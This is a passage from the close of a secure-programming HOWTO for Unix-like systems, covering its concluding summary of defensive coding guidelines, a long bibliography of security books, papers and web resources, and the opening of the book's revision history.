development project. If you are leading an open source software / free
software project, some useful guidelines can be found in [http://www.tldp.org
/HOWTO/Software-Proj-Mgmt-HOWTO/index.html] Free Software Project Management
HOWTO and [http://www.tldp.org/HOWTO/Software-Release-Practice-HOWTO/
index.html] Software Release Practice HOWTO; you should also read [http://
www.catb.org/~esr/writings/cathedral-bazaar] The Cathedral and the Bazaar.
Every once in a while, review security guidelines like this one. At least
re-read the conclusions in Chapter 12, and feel free to go back to the
introduction (Chapter 1) and start again!
-----------------------------------------------------------------------------
Chapter 12. Conclusion
   The end of a matter is better than its
beginning, and patience is better than
pride.
      -- Ecclesiastes 7:8 (NIV)
Designing and implementing a truly secure program is actually a difficult
task on Unix-like systems such as Linux and Unix. The difficulty is that a
truly secure program must respond appropriately to all possible inputs and
environments controlled by a potentially hostile user. Developers of secure
programs must deeply understand their platform, seek and use guidelines (such
as these), and then use assurance processes (such as inspections and other
peer review techniques) to reduce their programs' vulnerabilities.
In conclusion, here are some of the key guidelines in this book:
  * Validate all your inputs, including command line inputs, environment
variables, CGI inputs, and so on. Don't just reject ``bad'' input; define
what is an ``acceptable'' input and reject anything that doesn't match.
  * Avoid buffer overflow. Make sure that long inputs (and long intermediate
data values) can't be used to take over your program. This is the primary
programmatic error at this time.
  * Structure program internals. Secure the interface, minimize privileges,
make the initial configuration and defaults safe, and fail safe. Avoid
race conditions (e.g., by safely opening any files in a shared directory
like /tmp). Trust only trustworthy channels (e.g., most servers must not
trust their clients for security checks or other sensitive data such as
an item's price in a purchase).
  * Carefully call out to other resources. Limit their values to valid values
(in particular be concerned about metacharacters), and check all system
call return values.
  * Reply with information judiciously. In particular, minimize feedback, and
carefully handle full or unresponsive output to an untrusted user.
-----------------------------------------------------------------------------
Chapter 13. Bibliography
   The words of the wise are like goads,
their collected sayings like firmly
embedded nails--given by one Shepherd.
Be warned, my son, of anything in
addition to them. Of making many books
there is no end, and much study
wearies the body.
      -- Ecclesiastes 12:11-12 (NIV)
Note that there is a heavy emphasis on technical articles available on the
web, since this is where most of this kind of technical information is
available.
[Advosys 2000] Advosys Consulting (formerly named Webber Technical Services).
Writing Secure Web Applications. [http://advosys.ca/tips/web-security.html]
http://advosys.ca/tips/web-security.html
[Al-Herbish 1999] Al-Herbish, Thamer. 1999. Secure Unix Programming FAQ.
[http://www.whitefang.com/sup] http://www.whitefang.com/sup.
[Aleph1 1996] Aleph1. November 8, 1996. ``Smashing The Stack For Fun And
Profit''. Phrack Magazine. Issue 49, Article 14. [http://www.phrack.com/
search.phtml?view&article=p49-14] http://www.phrack.com/search.phtml?view&
article=p49-14 or alternatively [http://www.2600.net/phrack/p49-14.html]
http://www.2600.net/phrack/p49-14.html.
[Anonymous 1999] Anonymous. October 1999. Maximum Linux Security: A Hacker's
Guide to Protecting Your Linux Server and Workstation Sams. ISBN: 0672316706.
[Anonymous 1998] Anonymous. September 1998. Maximum Security : A Hacker's
Guide to Protecting Your Internet Site and Network. Sams. Second Edition.
ISBN: 0672313413.
[Anonymous Phrack 2001] Anonymous. August 11, 2001. Once upon a free().
Phrack, Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12. [http://phrack.org/
show.php?p=57&a=9] http://phrack.org/show.php?p=57&a=9
[AUSCERT 1996] Australian Computer Emergency Response Team (AUSCERT) and
O'Reilly. May 23, 1996 (rev 3C). A Lab Engineers Check List for Writing
Secure Unix Code. [ftp://ftp.auscert.org.au/pub/auscert/papers/
secure_programming_checklist] ftp://ftp.auscert.org.au/pub/auscert/papers/
secure_programming_checklist
[Bach 1986] Bach, Maurice J. 1986. The Design of the Unix Operating System.
Englewood Cliffs, NJ: Prentice-Hall, Inc. ISBN 0-13-201799-7 025.
[Beattie 2002] Beattie, Steve, Seth Arnold, Crispin Cowan, Perry Wagle, Chris
Wright, Adam Shostack. November 2002. Timing the Application of Security
Patches for Optimal Uptime. 2002 LISA XVI, November 3-8, 2002, Philadelphia,
PA.
[Bellovin 1989] Bellovin, Steven M. April 1989. "Security Problems in the TCP
/IP Protocol Suite" Computer Communications Review 2:19, pp. 32-48. [http://
www.research.att.com/~smb/papers/ipext.pdf] http://www.research.att.com/~smb/
papers/ipext.pdf
[Bellovin 1994] Bellovin, Steven M. December 1994. Shifting the Odds --
Writing (More) Secure Software. Murray Hill, NJ: AT&T Research. [http://
www.research.att.com/~smb/talks] http://www.research.att.com/~smb/talks
[Bishop 1996] Bishop, Matt. May 1996. ``UNIX Security: Security in
Programming''. SANS '96. Washington DC (May 1996). [http://
olympus.cs.ucdavis.edu/~bishop/secprog.html] http://olympus.cs.ucdavis.edu/
~bishop/secprog.html
[Bishop 1997] Bishop, Matt. October 1997. ``Writing Safe Privileged
Programs''. Network Security 1997 New Orleans, LA. [http://
olympus.cs.ucdavis.edu/~bishop/secprog.html] http://olympus.cs.ucdavis.edu/
~bishop/secprog.html
[Blaze 1996] Blaze, Matt, Whitfield Diffie, Ronald L. Rivest, Bruce Schneier,
Tsutomu Shimomura, Eric Thompson, and Michael Wiener. January 1996. ``Minimal
Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security: A
Report by an Ad Hoc Group of Cryptographers and Computer Scientists.'' [ftp:/
/ftp.research.att.com/dist/mab/keylength.txt] ftp://ftp.research.att.com/dist
/mab/keylength.txt and [ftp://ftp.research.att.com/dist/mab/keylength.ps]
ftp://ftp.research.att.com/dist/mab/keylength.ps.
[CC 1999] The Common Criteria for Information Technology Security Evaluation
(CC). August 1999. Version 2.1. Technically identical to International
Standard ISO/IEC 15408:1999. [http://csrc.nist.gov/cc/ccv20/ccv2list.htm]
http://csrc.nist.gov/cc/ccv20/ccv2list.htm
[CERT 1998] Computer Emergency Response Team (CERT) Coordination Center (CERT
/CC). February 13, 1998. Sanitizing User-Supplied Data in CGI Scripts. CERT
Advisory CA-97.25.CGI_metachar. [http://www.cert.org/advisories/
CA-97.25.CGI_metachar.html] http://www.cert.org/advisories/
CA-97.25.CGI_metachar.html.
[Cheswick 1994] Cheswick, William R. and Steven M. Bellovin. Firewalls and
Internet Security: Repelling the Wily Hacker. Full text at [http://
www.wilyhacker.com] http://www.wilyhacker.com.
[Clowes 2001] Clowes, Shaun. 2001. ``A Study In Scarlet - Exploiting Common
Vulnerabilities in PHP'' [http://www.securereality.com.au/archives.html]
http://www.securereality.com.au/archives.html
[CMU 1998] Carnegie Mellon University (CMU). February 13, 1998 Version 1.4.
``How To Remove Meta-characters From User-Supplied Data In CGI Scripts''.
[ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters] ftp://ftp.cert.org/pub/
tech_tips/cgi_metacharacters.
[Cowan 1999] Cowan, Crispin, Perry Wagle, Calton Pu, Steve Beattie, and
Jonathan Walpole. ``Buffer Overflows: Attacks and Defenses for the
Vulnerability of the Decade''. Proceedings of DARPA Information Survivability
Conference and Expo (DISCEX), [http://schafercorp-ballston.com/discex] http:/
/schafercorp-ballston.com/discex SANS 2000. [http://www.sans.org/newlook/
events/sans2000.htm] http://www.sans.org/newlook/events/sans2000.htm. For a
copy, see [http://immunix.org/documentation.html] http://immunix.org/
documentation.html.
[Cox 2000] Cox, Philip. March 30, 2001. Hardening Windows 2000. [http://
www.systemexperts.com/win2k/hardenW2K11.pdf] http://www.systemexperts.com/
win2k/hardenW2K11.pdf.
[Dobbertin 1996] Dobbertin, H. 1996. The Status of MD5 After a Recent
Attack. RSA Laboratories' CryptoBytes. Vol. 2, No. 2.
[Felten 1997] Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach.
Web Spoofing: An Internet Con Game Technical Report 540-96 (revised Feb.
1997) Department of Computer Science, Princeton University [http://
www.cs.princeton.edu/sip/pub/spoofing.pdf] http://www.cs.princeton.edu/sip/
pub/spoofing.pdf
[Fenzi 1999] Fenzi, Kevin, and Dave Wreski. April 25, 1999. Linux Security
HOWTO. Version 1.0.2. [http://www.tldp.org/HOWTO/Security-HOWTO.html] http://
www.tldp.org/HOWTO/Security-HOWTO.html
[FHS 1997] Filesystem Hierarchy Standard (FHS 2.0). October 26, 1997.
Filesystem Hierarchy Standard Group, edited by Daniel Quinlan. Version 2.0.
[http://www.pathname.com/fhs] http://www.pathname.com/fhs.
[Filipski 1986] Filipski, Alan and James Hanko. April 1986. ``Making Unix
Secure.'' Byte (Magazine). Peterborough, NH: McGraw-Hill Inc. Vol. 11, No. 4.
ISSN 0360-5280. pp. 113-128.
[Flake 2001] Flake, Halvar. Auditing Binaries for Security Vulnerabilities.
[http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html] http://
www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html.
[FOLDOC] Free On-Line Dictionary of Computing. [http://foldoc.doc.ic.ac.uk/
foldoc/index.html] http://foldoc.doc.ic.ac.uk/foldoc/index.html.
[Forristal 2001] Forristal, Jeff, and Greg Shipley. January 8, 2001.
Vulnerability Assessment Scanners. Network Computing. [http://www.nwc.com/
1201/1201f1b1.html] http://www.nwc.com/1201/1201f1b1.html
[FreeBSD 1999] FreeBSD, Inc. 1999. ``Secure Programming Guidelines''. FreeBSD
Security Information. [http://www.freebsd.org/security/security.html] http://
www.freebsd.org/security/security.html
[Friedl 1997] Friedl, Jeffrey E. F. 1997. Mastering Regular Expressions.
O'Reilly. ISBN 1-56592-257-3.
[FSF 1998] Free Software Foundation. December 17, 1999. Overview of the GNU
Project. [http://www.gnu.ai.mit.edu/gnu/gnu-history.html] http://
www.gnu.ai.mit.edu/gnu/gnu-history.html
[FSF 1999] Free Software Foundation. January 11, 1999. The GNU C Library
Reference Manual. Edition 0.08 DRAFT, for Version 2.1 Beta of the GNU C
Library. Available at, for example, [http://www.netppl.fi/~pp/glibc21/
libc_toc.html] http://www.netppl.fi/~pp/glibc21/libc_toc.html
[Fu 2001] Fu, Kevin, Emil Sit, Kendra Smith, and Nick Feamster. August 2001.
``Dos and Don'ts of Client Authentication on the Web''. Proceedings of the
10th USENIX Security Symposium, Washington, D.C., August 2001. [http://
cookies.lcs.mit.edu/pubs/webauth.html] http://cookies.lcs.mit.edu/pubs/
webauth.html.
[Gabrilovich 2002] Gabrilovich, Evgeniy, and Alex Gontmakher. February 2002.
``Inside Risks: The Homograph Attack''. Communications of the ACM. Volume 45,
Number 2. Page 128.
[Galvin 1998a] Galvin, Peter. April 1998. ``Designing Secure Software''.
Sunworld. [http://www.sunworld.com/swol-04-1998/swol-04-security.html] http:/
/www.sunworld.com/swol-04-1998/swol-04-security.html.
[Galvin 1998b] Galvin, Peter. August 1998. ``The Unix Secure Programming
FAQ''. Sunworld. [http://www.sunworld.com/sunworldonline/swol-08-1998/
swol-08-security.html] http://www.sunworld.com/sunworldonline/swol-08-1998/
swol-08-security.html
[Garfinkel 1996] Garfinkel, Simson and Gene Spafford. April 1996. Practical
UNIX & Internet Security, 2nd Edition. ISBN 1-56592-148-8. Sebastopol, CA:
O'Reilly & Associates, Inc. [http://www.oreilly.com/catalog/puis] http://
www.oreilly.com/catalog/puis
[Garfinkle 1997] Garfinkle, Simson. August 8, 1997. 21 Rules for Writing
Secure CGI Programs. [http://webreview.com/wr/pub/97/08/08/bookshelf] http://
webreview.com/wr/pub/97/08/08/bookshelf
[Gay 2000] Gay, Warren W. October 2000. Advanced Unix Programming.
Indianapolis, Indiana: Sams Publishing. ISBN 0-67231-990-X.
[Geodsoft 2001] Geodsoft. February 7, 2001. Hardening OpenBSD Internet
Servers. [http://www.geodsoft.com/howto/harden] http://www.geodsoft.com/howto
/harden.
[Graham 1999] Graham, Jeff. May 4, 1999. Security-Audit's Frequently Asked
Questions (FAQ). [http://lsap.org/faq.txt] http://lsap.org/faq.txt
[Gong 1999] Gong, Li. June 1999. Inside Java 2 Platform Security. Reading,
MA: Addison Wesley Longman, Inc. ISBN 0-201-31000-7.
[Gundavaram Unknown] Gundavaram, Shishir, and Tom Christiansen. Date Unknown.
Perl CGI Programming FAQ. [http://language.perl.com/CPAN/doc/FAQs/cgi/
perl-cgi-faq.html] http://language.perl.com/CPAN/doc/FAQs/cgi/
perl-cgi-faq.html
[Hall 1999] Hall, Brian "Beej". Beej's Guide to Network Programming Using
Internet Sockets. 13-Jan-1999. Version 1.5.5. [http://www.ecst.csuchico.edu/
~beej/guide/net] http://www.ecst.csuchico.edu/~beej/guide/net
[Howard 2002] Howard, Michael and David LeBlanc. 2002. Writing Secure Code.
Redmond, Washington: Microsoft Press. ISBN 0-7356-1588-8.
[ISO 12207] International Organization for Standardization (ISO). 1995.
Information technology -- Software life cycle processes ISO/IEC 12207:1995.
[ISO 13335] International Organization for Standardization (ISO). ISO/IEC TR
13335. Guidelines for the Management of IT Security (GMITS). Note that this
is a five-part technical report (not a standard); see also ISO/IEC 17799:
2000. It includes:
  * ISO 13335-1: Concepts and Models for IT Security
  * ISO 13335-2: Managing and Planning IT Security
  * ISO 13335-3: Techniques for the Management of IT Security
  * ISO 13335-4: Selection of Safeguards
  * ISO 13335-5: Safeguards for External Connections
[ISO 17799] International Organization for Standardization (ISO). December
2000. Code of Practice for Information Security Management. ISO/IEC 17799:
2000.
[ISO 9000] International Organization for Standardization (ISO). 2000.
Quality management systems - Fundamentals and vocabulary. ISO 9000:2000. See
[http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/
iso9000family.html] http://www.iso.ch/iso/en/iso9000-14000/iso9000/
selection_use/iso9000family.html
[ISO 9001] International Organization for Standardization (ISO). 2000.
Quality management systems - Requirements ISO 9001:2000
[Jones 2000] Jones, Jennifer. October 30, 2000. ``Banking on Privacy''.
InfoWorld, Volume 22, Issue 44. San Mateo, CA: International Data Group
(IDG). pp. 1-12.
[Kelsey 1998] Kelsey, J., B. Schneier, D. Wagner, and C. Hall. March 1998.
"Cryptanalytic Attacks on Pseudorandom Number Generators." Fast Software
Encryption, Fifth International Workshop Proceedings (March 1998),
Springer-Verlag, 1998, pp. 168-188. [http://www.counterpane.com/
pseudorandom_number.html] http://www.counterpane.com/
pseudorandom_number.html.
[Kernighan 1988] Kernighan, Brian W., and Dennis M. Ritchie. 1988. The C
Programming Language. Second Edition. Englewood Cliffs, NJ: Prentice-Hall.
ISBN 0-13-110362-8.
[Kim 1996] Kim, Eugene Eric. 1996. CGI Developer's Guide. SAMS.net
Publishing. ISBN: 1-57521-087-8 [http://www.eekim.com/pubs/cgibook] http://
www.eekim.com/pubs/cgibook
[Kolsek 2002] Kolsek, Mitja. December 2002. Session Fixation Vulnerability in
Web-based Applications [http://www.acros.si/papers/session_fixation.pdf]
http://www.acros.si/papers/session_fixation.pdf.
[Kuchling 2000] Kuchling, A.M. 2000. Restricted Execution HOWTO. [http://
www.python.org/doc/howto/rexec/rexec.html] http://www.python.org/doc/howto/
rexec/rexec.html
[Kuhn 2002] Kuhn, Markus G. Optical Time-Domain Eavesdropping Risks of CRT
displays. Proceedings of the 2002 IEEE Symposium on Security and Privacy,
Oakland, CA, May 12-15, 2002. [http://www.cl.cam.ac.uk/~mgk25/
ieee02-optical.pdf] http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf
[LSD 2001] The Last Stage of Delirium. July 4, 2001. UNIX Assembly Codes
Development for Vulnerabilities Illustration Purposes. [http://lsd-pl.net/
papers.html#assembly] http://lsd-pl.net/papers.html#assembly.
[McClure 1999] McClure, Stuart, Joel Scambray, and George Kurtz. 1999.
Hacking Exposed: Network Security Secrets and Solutions. Berkeley, CA:
Osbourne/McGraw-Hill. ISBN 0-07-212127-0.
[McKusick 1999] McKusick, Marshall Kirk. January 1999. ``Twenty Years of
Berkeley Unix: From AT&T-Owned to Freely Redistributable.'' Open Sources:
Voices from the Open Source Revolution. [http://www.oreilly.com/catalog/
opensources/book/kirkmck.html] http://www.oreilly.com/catalog/opensources/
book/kirkmck.html.
[McGraw 1999] McGraw, Gary, and Edward W. Felten. December 1998. Twelve Rules
for developing more secure Java code. Javaworld. [http://www.javaworld.com/
javaworld/jw-12-1998/jw-12-securityrules.html] http://www.javaworld.com/
javaworld/jw-12-1998/jw-12-securityrules.html.
[McGraw 1999] McGraw, Gary, and Edward W. Felten. January 25, 1999. Securing
Java: Getting Down to Business with Mobile Code, 2nd Edition John Wiley &
Sons. ISBN 047131952X. [http://www.securingjava.com] http://
www.securingjava.com.
[McGraw 2000a] McGraw, Gary and John Viega. March 1, 2000. Make Your Software
Behave: Learning the Basics of Buffer Overflows. [http://www-4.ibm.com/
software/developer/library/overflows/index.html] http://www-4.ibm.com/
software/developer/library/overflows/index.html.
[McGraw 2000b] McGraw, Gary and John Viega. April 18, 2000. Make Your
Software Behave: Software strategies. In the absence of hardware, you can
devise a reasonably secure random number generator through software. [http://
www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security]
http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=
security.
[Miller 1995] Miller, Barton P., David Koski, Cjin Pheow Lee, Vivekananda
Maganty, Ravi Murthy, Ajitkumar Natarajan, and Jeff Steidl. 1995. Fuzz
Revisited: A Re-examination of the Reliability of UNIX Utilities and
Services. [ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf]
ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf.
[Miller 1999] Miller, Todd C. and Theo de Raadt. ``strlcpy and strlcat --
Consistent, Safe, String Copy and Concatenation'' Proceedings of Usenix '99.
[http://www.usenix.org/events/usenix99/millert.html] http://www.usenix.org/
events/usenix99/millert.html and [http://www.usenix.org/events/usenix99/
full_papers/millert/PACKING_LIST] http://www.usenix.org/events/usenix99/
full_papers/millert/PACKING_LIST
[Mookhey 2002] Mookhey, K. K. The Unix Auditor's Practical Handbook. [http://
www.nii.co.in/tuaph.html] http://www.nii.co.in/tuaph.html.
[Mudge 1995] Mudge. October 20, 1995. How to write Buffer Overflows. l0pht
advisories. [http://www.l0pht.com/advisories/bufero.html] http://
www.l0pht.com/advisories/bufero.html.
[Murhammer 1998] Murhammer, Martin W., Orcun Atakan, Stefan Bretz, Larry R.
Pugh, Kazunari Suzuki, and David H. Wood. October 1998. TCP/IP Tutorial and
Technical Overview IBM International Technical Support Organization. [http://
www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf] http://
www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf
[NCSA] NCSA Secure Programming Guidelines. [http://www.ncsa.uiuc.edu/General/
Grid/ACES/security/programming] http://www.ncsa.uiuc.edu/General/Grid/ACES/
security/programming.
[Neumann 2000] Neumann, Peter. 2000. "Robust Nonproprietary Software."
Proceedings of the 2000 IEEE Symposium on Security and Privacy (the ``Oakland
Conference''), May 14-17, 2000, Berkeley, CA. Los Alamitos, CA: IEEE Computer
Society. pp.122-123.
[NSA 2000] National Security Agency (NSA). September 2000. Information
Assurance Technical Framework (IATF). [http://www.iatf.net] http://
www.iatf.net.
[Open Group 1997] The Open Group. 1997. Single UNIX Specification, Version 2
(UNIX 98). [http://www.opengroup.org/online-pubs?DOC=007908799] http://
www.opengroup.org/online-pubs?DOC=007908799.
[OSI 1999] Open Source Initiative. 1999. The Open Source Definition. [http://
www.opensource.org/osd.html] http://www.opensource.org/osd.html.
[Opplinger 1998] Oppliger, Rolf. 1998. Internet and Intranet Security.
Norwood, MA: Artech House. ISBN 0-89006-829-1.
[Paulk 1993a] Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and Charles V.
Weber. Capability Maturity Model for Software, Version 1.1. Software
Engineering Institute, CMU/SEI-93-TR-24. DTIC Number ADA263403, February
1993. [http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html] http://
www.sei.cmu.edu/activities/cmm/obtain.cmm.html.
[Paulk 1993b] Mark C. Paulk, Charles V. Weber, Suzanne M. Garcia, Mary Beth
Chrissis, and Marilyn W. Bush. Key Practices of the Capability Maturity
Model, Version 1.1. Software Engineering Institute. CMU/SEI-93-TR-25, DTIC
Number ADA263432, February 1993.
[Peteanu 2000] Peteanu, Razvan. July 18, 2000. Best Practices for Secure Web
Development. [http://members.home.net/razvan.peteanu] http://members.home.net
/razvan.peteanu
[Pfleeger 1997] Pfleeger, Charles P. 1997. Security in Computing. Upper
Saddle River, NJ: Prentice-Hall PTR. ISBN 0-13-337486-6.
[Phillips 1995] Phillips, Paul. September 3, 1995. Safe CGI Programming.
[http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt] http://
www.go2net.com/people/paulp/cgi-security/safe-cgi.txt
[Quintero 1999] Quintero, Federico Mena, Miguel de Icaza, and Morten
Welinder. GNOME Programming Guidelines. [http://developer.gnome.org/doc/guides/
programming-guidelines/book1.html] http://developer.gnome.org/doc/guides/
programming-guidelines/book1.html
[Raymond 1997] Raymond, Eric. 1997. The Cathedral and the Bazaar. [http://
www.catb.org/~esr/writings/cathedral-bazaar] http://www.catb.org/~esr/
writings/cathedral-bazaar
[Raymond 1998] Raymond, Eric. April 1998. Homesteading the Noosphere. [http:/
/www.catb.org/~esr/writings/homesteading/homesteading.html] http://
www.catb.org/~esr/writings/homesteading/homesteading.html
[Ranum 1998] Ranum, Marcus J. 1998. Security-critical coding for programmers
- a C and UNIX-centric full-day tutorial. [http://www.clark.net/pub/mjr/pubs/
pdf/] http://www.clark.net/pub/mjr/pubs/pdf/.
[RFC 822] August 13, 1982. Standard for the Format of ARPA Internet Text
Messages. IETF RFC 822. [http://www.ietf.org/rfc/rfc0822.txt] http://
www.ietf.org/rfc/rfc0822.txt.
[rfp 1999] rain.forest.puppy. 1999. ``Perl CGI problems''. Phrack Magazine.
Issue 55, Article 07. [http://www.phrack.com/search.phtml?view&article=p55-7]
http://www.phrack.com/search.phtml?view&article=p55-7 or [http://
www.insecure.org/news/P55-07.txt] http://www.insecure.org/news/P55-07.txt.
[Rijmen 2000] Rijmen, Vincent. "LinuxSecurity.com Speaks With AES Winner".
[http://www.linuxsecurity.com/feature_stories/interview-aes-3.html] http://
www.linuxsecurity.com/feature_stories/interview-aes-3.html.
[Rochkind 1985] Rochkind, Marc J. 1985. Advanced Unix Programming. Englewood
Cliffs, NJ: Prentice-Hall, Inc. ISBN 0-13-011818-4.
[Sahu 2002] Sahu, Bijaya Nanda, Srinivasan S. Muthuswamy, Satya Nanaji Rao
Mallampalli, and Venkata R. Bonam. July 2002 ``Is your Java code secure -- or
exposed? Build safer applications now to avoid trouble later'' [http://
www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain]
http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=
dwmain
[St. Laurent 2000] St. Laurent, Simon. February 2000. XTech 2000 Conference
Reports. ``When XML Gets Ugly''. [http://www.xml.com/pub/2000/02/xtech/
megginson.html] http://www.xml.com/pub/2000/02/xtech/megginson.html.
[Saltzer 1974] Saltzer, J. July 1974. ``Protection and the Control of
Information Sharing in MULTICS''. Communications of the ACM. v17 n7. pp.
388-402.
[Saltzer 1975] Saltzer, J., and M. Schroeder. September 1975. ``The
Protection of Information in Computing Systems''. Proceedings of the IEEE.
v63 n9. pp. 1278-1308. [http://www.mediacity.com/~norm/CapTheory/ProtInf]
http://www.mediacity.com/~norm/CapTheory/ProtInf. Summarized in [Pfleeger
1997, 286].
[Schneider 2000] Schneider, Fred B. 2000. "Open Source in Security: Visiting
the Bizarre." Proceedings of the 2000 IEEE Symposium on Security and Privacy
(the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA. Los Alamitos,
CA: IEEE Computer Society. pp.126-127.
[Schneier 1996] Schneier, Bruce. 1996. Applied Cryptography, Second Edition:
Protocols, Algorithms, and Source Code in C. New York: John Wiley and Sons.
ISBN 0-471-12845-7.
[Schneier 1998] Schneier, Bruce and Mudge. November 1998. Cryptanalysis of
Microsoft's Point-to-Point Tunneling Protocol (PPTP) Proceedings of the 5th
ACM Conference on Communications and Computer Security, ACM Press. [http://
www.counterpane.com/pptp.html] http://www.counterpane.com/pptp.html.
[Schneier 1999] Schneier, Bruce. September 15, 1999. ``Open Source and
Security''. Crypto-Gram. Counterpane Internet Security, Inc. [http://
www.counterpane.com/crypto-gram-9909.html] http://www.counterpane.com/
crypto-gram-9909.html
[Seifried 1999] Seifried, Kurt. October 9, 1999. Linux Administrator's
Security Guide. [http://www.securityportal.com/lasg] http://
www.securityportal.com/lasg.
[Seifried 2001] Seifried, Kurt. September 2, 2001. WWW Authentication [http:/
/www.seifried.org/security/www-auth/index.html] http://www.seifried.org/
security/www-auth/index.html.
[Shankland 2000] Shankland, Stephen. ``Linux poses increasing threat to
Windows 2000''. CNET. [http://news.cnet.com/news/0-1003-200-1549312.html]
http://news.cnet.com/news/0-1003-200-1549312.html
[Shostack 1999] Shostack, Adam. June 1, 1999. Security Code Review Guidelines
. [http://www.homeport.org/~adam/review.html] http://www.homeport.org/~adam/
review.html.
[Sibert 1996] Sibert, W. Olin. Malicious Data and Computer Security. (NIST)
NISSC '96. [http://www.fish.com/security/maldata.html] http://www.fish.com/
security/maldata.html
[Sitaker 1999] Sitaker, Kragen. Feb 26, 1999. How to Find Security Holes
[http://www.pobox.com/~kragen/security-holes.html] http://www.pobox.com/
~kragen/security-holes.html and [http://www.dnaco.net/~kragen/
security-holes.html] http://www.dnaco.net/~kragen/security-holes.html
[SSE-CMM 1999] SSE-CMM Project. April 1999. Systems Security Engineering
Capability Maturity Model (SSE CMM) Model Description Document. Version 2.0.
[http://www.sse-cmm.org] http://www.sse-cmm.org
[Stallings 1996] Stallings, William. Practical Cryptography for Data
Internetworks. Los Alamitos, CA: IEEE Computer Society Press. ISBN
0-8186-7140-8.
[Stein 1999] Stein, Lincoln D. September 13, 1999. The World Wide Web
Security FAQ. Version 2.0.1 [http://www.w3.org/Security/Faq/
www-security-faq.html] http://www.w3.org/Security/Faq/www-security-faq.html
[Swan 2001] Swan, Daniel. January 6, 2001. comp.os.linux.security FAQ.
Version 1.0. [http://www.linuxsecurity.com/docs/colsfaq.html] http://
www.linuxsecurity.com/docs/colsfaq.html.
[Swanson 1996] Swanson, Marianne, and Barbara Guttman. September 1996.
Generally Accepted Principles and Practices for Securing Information
Technology Systems. NIST Computer Security Special Publication (SP) 800-14.
[http://csrc.nist.gov/publications/nistpubs/index.html] http://csrc.nist.gov/
publications/nistpubs/index.html.
[Thompson 1974] Thompson, K. and D.M. Ritchie. July 1974. ``The UNIX
Time-Sharing System''. Communications of the ACM. Vol. 17, No. 7. pp. 365-375.
[Torvalds 1999] Torvalds, Linus. February 1999. ``The Story of the Linux
Kernel''. Open Sources: Voices from the Open Source Revolution. Edited by
Chris Dibona, Mark Stone, and Sam Ockman. O'Reilly and Associates. ISBN
1565925823. [http://www.oreilly.com/catalog/opensources/book/linus.html]
http://www.oreilly.com/catalog/opensources/book/linus.html
[TruSecure 2001] TruSecure. August 2001. Open Source Security: A Look at the
Security Benefits of Source Code Access. [http://www.trusecure.com/html/tspub
/whitepapers/open_source_security5.pdf] http://www.trusecure.com/html/tspub/
whitepapers/open_source_security5.pdf
[Unknown] SETUID(7) [http://www.homeport.org/~adam/setuid.7.html] http://
www.homeport.org/~adam/setuid.7.html.
[Van Biesbrouck 1996] Van Biesbrouck, Michael. April 19, 1996. [http://
www.csclub.uwaterloo.ca/u/mlvanbie/cgisec] http://www.csclub.uwaterloo.ca/u/
mlvanbie/cgisec.
[van Oorschot 1994] van Oorschot, P. and M. Wiener. November 1994. ``Parallel
Collision Search with Applications to Hash Functions and Discrete
Logarithms.'' Proceedings of ACM Conference on Computer and Communications
Security.
[Venema 1996] Venema, Wietse. 1996. Murphy's law and computer security.
[http://www.fish.com/security/murphy.html] http://www.fish.com/security/
murphy.html
[Viega 2002] Viega, John, and Gary McGraw. 2002. Building Secure Software.
Addison-Wesley. ISBN 0201-72152-X.
[Watters 1996] Watters, Aaron, Guido van Rossum, and James C. Ahlstrom. 1996.
Internet Programming with Python. New York: Henry Holt and Company, Inc.
[Wheeler 1996] Wheeler, David A., Bill Brykczynski, and Reginald N. Meeson,
Jr. Software Inspection: An Industry Best Practice. 1996. Los Alamitos, CA:
IEEE Computer Society Press. IEEE Computer Society Press Order Number
BP07340. Library of Congress Number 95-41054. ISBN 0-8186-7340-0.
[Witten 2001] Witten, Brian, Carl Landwehr, and Michael Caloyannides.
September/October 2001. ``Does Open Source Improve System Security?'' IEEE
Software. pp. 57-61. [http://www.computer.org/software] http://
www.computer.org/software
[Wood 1985] Wood, Patrick H. and Stephen G. Kochan. 1985. Unix System
Security. Indianapolis, Indiana: Hayden Books. ISBN 0-8104-6267-2.
[Wreski 1998] Wreski, Dave. August 22, 1998. Linux Security Administrator's
Guide. Version 0.98. [http://www.nic.com/~dave/SecurityAdminGuide/index.html]
http://www.nic.com/~dave/SecurityAdminGuide/index.html
[Yoder 1998] Yoder, Joseph and Jeffrey Barcalow. 1998. Architectural Patterns
for Enabling Application Security. PLoP '97 [http://st-www.cs.uiuc.edu/
~hanmer/PLoP-97/Proceedings/yoder.pdf] http://st-www.cs.uiuc.edu/~hanmer/
PLoP-97/Proceedings/yoder.pdf
[Zalewski 2001] Zalewski, Michael. May 16-17, 2001. Delivering Signals for
Fun and Profit: Understanding, exploiting and preventing signal-handling
related vulnerabilities. Bindview Corporation. [http://razor.bindview.com/
publish/papers/signals.txt] http://razor.bindview.com/publish/papers/
signals.txt
[Zoebelein 1999] Zoebelein, Hans U. April 1999. The Internet Operating System
Counter. [http://www.leb.net/hzo/ioscount] http://www.leb.net/hzo/ioscount.
-----------------------------------------------------------------------------
Appendix A. History
Here are a few key events in the development of this book, starting from most
recent events:
2002-10-29 David A. Wheeler
Version 3.000 released, adding a new section on determining security
requirements and a discussion of the Common Criteria, broadening the
document. Many smaller improvements were incorporated as well.
2001-01-01 David A. Wheeler
Version 2.70 released, adding a significant amount of additional
material, such as a significant expansion of the discussion of cross-site
malicious content, HTML/URI filtering, and handling temporary files.
2000-05-24 David A. Wheeler
